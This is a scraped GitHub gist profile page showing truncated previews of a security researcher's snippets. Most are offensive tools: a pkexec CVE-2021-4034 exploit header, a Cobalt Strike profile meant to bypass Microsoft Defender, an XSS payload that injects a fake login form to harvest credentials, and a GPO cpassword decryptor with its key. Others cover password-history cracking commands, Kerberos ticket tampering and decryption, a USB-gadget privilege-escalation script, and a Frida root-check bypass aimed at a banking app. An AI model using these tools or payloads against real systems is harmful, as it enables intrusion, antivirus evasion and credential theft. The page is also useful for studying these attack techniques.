Skip to content

Instantly share code, notes, and snippets.

View tothi's full-sized avatar
:shipit:

tothi

:shipit:
548 followers · 157 following
View GitHub Profile
@tothi
tothi / blasty-vs-pkexec-mod.c
Last active January 27, 2022 18:55
CVE-2021-4034
/*
* blasty-vs-pkexec-mod.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
@tothi
tothi / upgrade_LineageOS_with_Magisk.md
Last active January 19, 2025 11:53
Upgrading LineageOS and reinstalling Magisk

Upgrade LineageOS with Magisk

WARNING: tested only on my setup (LineageOS 18.1 on instantnoodle), other setups may break and brick the device!

Step-by-step instructions (for reinstalling patched boot.img for Magisk):

  1. upgrade LineageOS to the latest by the standard way in Android GUI (download + install + reboot)
  2. if using not the latest Magisk: wipe old (possibly hidden) Magisk app then install the up-to-date one from the official Magisk github repo
  3. install (git clone) payload_dumper from GitHub (in Termux or in an SSH session on the Android device) for the 1st time, or update (git pull) later
  4. the Android terminal session: wget the same LineageOS nightly image installed in step 1 from https://download.lineageos.org/
@tothi
tothi / minimal-defender-bypass.profile
Last active April 1, 2025 22:38
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@tothi
tothi / setKerbRealm.py
Created November 25, 2021 16:46
This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#!/usr/bin/env python
#
# This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#
from pyasn1.codec.der import decoder, encoder
from impacket.krb5.asn1 import KRB_CRED, Ticket, seq_set_iter
from impacket.krb5 import types
@tothi
tothi / xss-phisher.js
Created November 3, 2021 02:50
XSS Phishing Payload
var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
</div>
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
<p>An error occurred. Please login again.</p>
<form id=\"phishingForm\"">
<p>Username <input type=\"text\" name=\"username\"></p>
<p>Password <input type=\"password\" name=\"password\"></p>
<p><input type=\"submit\" value=\"Login\"></p>
</form>
@tothi
tothi / gpo-decrypt.py
Created October 10, 2021 22:56
Decrypt "cpassword" found in GPO configs
#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES
def decrypt(cpass):
key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
iv = b'\x00' * 16
@tothi
tothi / PwnHistory.md
Created September 17, 2021 21:33
Combine cracked historical passwords with numbers in order to crack the current ones

Attacking user behaviour as a consequence of forced regular password change

Let's assume using ophcrack for cracking NT hashes in pwdump format where the pwdump includes password history hashes also. Assume we have cracked several hashes in the history.

Steps for getting more passwords cracked (assuming users just increase/decrease/edit numbers at the end of their passwords on regular forced password change by policy):

  1. Get cracked passwords (including history):
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
@tothi
tothi / decryptKerbTicket.py
Last active February 15, 2025 00:16 — forked from xan7r/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python3
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
@tothi
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
@tothi
tothi / antirootbypass.js
Created August 12, 2021 01:24
Frida antiroot check bypass for hu.khb (using com.vasco.digipass)
// Frida dumb antiroot check bypass on LineageOS for the
// com.vasco.digipass root checker in hu.khb banking app
//
// run with: frida -U -f hu.khb -l antirootbypass.js --no-pause
// root file existence check
Interceptor.attach(Module.findExportByName(null, 'access'), {
onEnter: function (args) {
this._pathname = args[0].readCString();
this._mode = args[1];